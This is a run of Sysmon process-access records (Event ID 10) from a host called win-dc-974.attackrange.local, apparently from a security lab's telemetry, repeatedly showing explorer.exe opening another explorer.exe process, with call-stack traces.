16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 